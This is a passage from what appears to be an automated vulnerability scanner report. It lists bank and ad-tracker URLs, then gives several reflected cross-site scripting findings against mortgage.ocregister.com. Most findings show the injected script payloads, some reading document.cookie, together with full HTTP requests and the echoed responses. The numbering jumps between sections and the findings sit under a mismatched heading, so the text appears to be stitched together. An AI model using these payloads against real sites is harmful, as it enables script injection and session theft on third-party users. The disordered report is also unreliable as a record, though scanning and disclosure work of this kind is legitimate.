10.123. https://www.regions.com/personal_banking/private_client.rf

10.124. https://www.regions.com/personal_banking/regionsnet.rf

10.125. https://www.regions.com/personal_banking/regionsnet_bill_pay.rf

10.126. https://www.regions.com/personal_banking/retirement_planning.rf

10.127. https://www.regions.com/personal_banking/savings_cds.rf

10.128. https://www.regions.com/personal_banking/trust_asset.rf

10.129. https://www.regions.com/small_business.rf

10.130. https://www.regions.com/system/gateway.rf

10.131. https://www.regions.com/templateOverview.aspx

10.132. https://www.regions.com/virtualMedia/img2297.gif

10.133. https://www.regions.com/virtualMedia/img2608.gif

10.134. https://www.regions.com/virtualMedia/img2853.jpg

10.135. https://www.regions.com/virtualMedia/img2859.gif

10.136. https://www.regions.com/virtualMedia/img2861.gif

10.137. https://www.regions.com/virtualMedia/img482.jpg

10.138. https://www.suntrust.com/imageserver/plumtree/common/private/js/jsincluder/LATEST/PTIncluder.js

10.139. https://www.supermedia.com/spportal/spportalFlow.do

10.140. https://www.us.hsbc.com/1/2/3/hsbcpremier/contact-us-form

10.141. https://www.us.hsbc.com/1/2/3/personal/online-services/personal-internet-banking/log-on

10.142. https://www.wachovia.com/

10.143. https://www.wellsfargo.com/

10.144. https://www.wellsfargo.com/about/

10.145. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1

10.146. https://www.wellsfargo.com/jump/wachovia/insurance/identity

10.147. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer

10.148. https://www.wellsfargo.com/locator/atm/search

10.149. https://www.wellsfargo.com/mortgage/

10.150. https://www.wellsfargo.com/mortgage/apply/

10.151. https://www.wellsfargo.com/mortgage/buy/

10.152. https://www.wellsfargo.com/mortgage/locations/

10.153. https://www.wellsfargo.com/mortgage/rates/

10.154. https://www.wellsfargo.com/mortgage/refinance/

10.155. https://www.wellsfargo.com/tas

10.156. https://www.wellsfargo.com/wachovia

10.157. https://www.wellsfargo.com/wachovia/autoloans/index

10.158. https://www.wellsfargo.com/wachovia/insurance

10.159. https://www.wellsfargo.com/wachovia/mortgage/index

10.160. https://www.wellsfargo.com/wachovia/wealthmanagement/index

10.161. https://www.zionsbank.com/ichecking_landing.jsp

10.162. https://www134.americanexpress.com/consumertravel/travel.do

10.163. https://www152.americanexpress.com/premium/credit-card-travel-insurance/home.do

10.164. https://www209.americanexpress.com/merchant/mainpagedom/authreg_showMainpage.do

10.165. https://www217.americanexpress.com/cards/home.do

10.166. https://www217.americanexpress.com/cards/shopping/index.jsp

11. Session token in URL

11.1. http://bh.contextweb.com/bh/set.aspx

11.2. http://c.chango.com/collector/am/pixel

11.3. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania

11.4. http://dev.virtualearth.net/services/v1/ImageryMetadataService/ImageryMetadataService.asmx/GetBirdsEyeSceneByLocation

11.5. http://dev.virtualearth.net/services/v1/geocodeservice/geocodeservice.asmx/Geocode

11.6. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log

11.7. http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/

11.8. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/

11.9. http://fls.doubleclick.net/activityi

11.10. http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/

11.11. http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/

11.12. http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/

11.13. http://l.sharethis.com/pview

11.14. http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/

11.15. http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/

11.16. http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/

11.17. http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/

11.18. http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/

11.19. http://lansner.ocregister.com/category/outlooks/eyeball-11/

11.20. http://mortgage.ocregister.com/

11.21. http://mortgage.ocregister.com/2007/02/

11.22. http://mortgage.ocregister.com/2007/03/

11.23. http://mortgage.ocregister.com/2007/04/

11.24. http://mortgage.ocregister.com/2007/05/

11.25. http://mortgage.ocregister.com/2007/06/

11.26. http://mortgage.ocregister.com/2007/07/

11.27. http://mortgage.ocregister.com/2007/08/

11.28. http://mortgage.ocregister.com/2007/09/

11.29. http://mortgage.ocregister.com/2007/10/

11.30. http://mortgage.ocregister.com/2007/11/

11.31. http://mortgage.ocregister.com/2007/12/

11.32. http://mortgage.ocregister.com/2008/01/

11.33. http://mortgage.ocregister.com/2008/02/

11.34. http://mortgage.ocregister.com/2008/03/

11.35. http://mortgage.ocregister.com/2008/04/

11.36. http://mortgage.ocregister.com/2008/05/

11.37. http://mortgage.ocregister.com/2008/06/

11.38. http://mortgage.ocregister.com/2008/07/

11.39. http://mortgage.ocregister.com/2008/08/

11.40. http://mortgage.ocregister.com/2008/09/

11.41. http://mortgage.ocregister.com/2008/10/

11.42. http://mortgage.ocregister.com/2008/11/

11.43. http://mortgage.ocregister.com/2008/12/

11.44. http://mortgage.ocregister.com/2009/01/

11.45. http://mortgage.ocregister.com/2009/02/

11.46. http://mortgage.ocregister.com/2009/03/

11.47. http://mortgage.ocregister.com/2009/04/

11.48. http://mortgage.ocregister.com/2009/05/

11.49. http://mortgage.ocregister.com/2009/06/

11.50. http://mortgage.ocregister.com/2009/07/

11.51. http://mortgage.ocregister.com/2009/08/

11.52. http://mortgage.ocregister.com/2009/09/

11.53. http://mortgage.ocregister.com/2009/10/

11.54. http://mortgage.ocregister.com/2009/11/

11.55. http://mortgage.ocregister.com/2009/12/

11.56. http://mortgage.ocregister.com/2010/01/

11.57. http://mortgage.ocregister.com/2010/02/

11.58. http://mortgage.ocregister.com/2010/03/

11.59. http://mortgage.ocregister.com/2010/04/

11.60. http://mortgage.ocregister.com/2010/05/

11.61. http://mortgage.ocregister.com/2010/06/

11.62. http://mortgage.ocregister.com/2010/07/

11.63. http://mortgage.ocregister.com/2010/08/

11.64. http://mortgage.ocregister.com/2010/09/

11.65. http://mortgage.ocregister.com/2010/10/

11.66. http://mortgage.ocregister.com/2010/11/

11.67. http://mortgage.ocregister.com/2010/12/

11.68. http://mortgage.ocregister.com/2011/01/

11.69. http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/

11.70. http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/

11.71. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/

11.72. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/

11.73. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/

11.74. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/

11.75. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/

11.76. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/

11.77. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/

11.78. http://mortgage.ocregister.com/2011/02/

11.79. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/

11.80. http://mortgage.ocregister.com/feeda71cd">1f35e8c0ea2/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b243<script>alert(1)</script>b89f925ed73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/feed/" />
...[SNIP]...

4.388. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a614"><script>alert(1)</script>e492f5d219d was submitted in the REST URL parameter 1. This input was echoed as 4a614\"><script>alert(1)</script>e492f5d219d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(14a614"><script>alert(1)</script>e492f5d219d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(14a614\"><script>alert(1)</script>e492f5d219dfeed/" />
...[SNIP]...

4.389. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee1f2"><script>alert(1)</script>14894bf18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee1f2\"><script>alert(1)</script>14894bf18ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2"><script>alert(1)</script>14894bf18ef=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2\"><script>alert(1)</script>14894bf18ef=1feed/" />
...[SNIP]...

4.390. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efa0"><script>alert(1)</script>c5d2576f89d was submitted in the REST URL parameter 1. This input was echoed as 2efa0\"><script>alert(1)</script>c5d2576f89d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0"><script>alert(1)</script>c5d2576f89d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0\"><script>alert(1)</script>c5d2576f89dfeed/" />
...[SNIP]...

4.391. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19724"><script>alert(1)</script>5a15440a445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19724\"><script>alert(1)</script>5a15440a445 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724"><script>alert(1)</script>5a15440a445=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
el="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724\"><script>alert(1)</script>5a15440a445=1feed/" />
...[SNIP]...

4.392. http://mortgage.ocregister.com/files [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /files

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7804f"><script>alert(1)</script>b31526e044f was submitted in the REST URL parameter 1. This input was echoed as 7804f\"><script>alert(1)</script>b31526e044f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files7804f"><script>alert(1)</script>b31526e044f HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files7804f\"><script>alert(1)</script>b31526e044ffeed/" />
...[SNIP]...

4.393. http://mortgage.ocregister.com/files [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /files

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcea"><script>alert(1)</script>d63783f7e5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bcea\"><script>alert(1)</script>d63783f7e5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files?3bcea"><script>alert(1)</script>d63783f7e5a=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files?3bcea\"><script>alert(1)</script>d63783f7e5a=1feed/" />
...[SNIP]...

4.394. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12f7c"><script>alert(1)</script>5e4882fdc7d was submitted in the REST URL parameter 1. This input was echoed as 12f7c\"><script>alert(1)</script>5e4882fdc7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.012f7c"><script>alert(1)</script>5e4882fdc7d/Content/dmhotlinks.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.012f7c\"><script>alert(1)</script>5e4882fdc7d/Content/dmhotlinks.cssfeed/" />
...[SNIP]...

4.395. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b7a"><script>alert(1)</script>df3c8a873d1 was submitted in the REST URL parameter 2. This input was echoed as 17b7a\"><script>alert(1)</script>df3c8a873d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Content17b7a"><script>alert(1)</script>df3c8a873d1/dmhotlinks.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:05 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.0/Content17b7a\"><script>alert(1)</script>df3c8a873d1/dmhotlinks.cssfeed/" />
...[SNIP]...

4.396. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92232"><script>alert(1)</script>8606eb47764 was submitted in the REST URL parameter 3. This input was echoed as 92232\"><script>alert(1)</script>8606eb47764 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Content/dmhotlinks.css92232"><script>alert(1)</script>8606eb47764 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
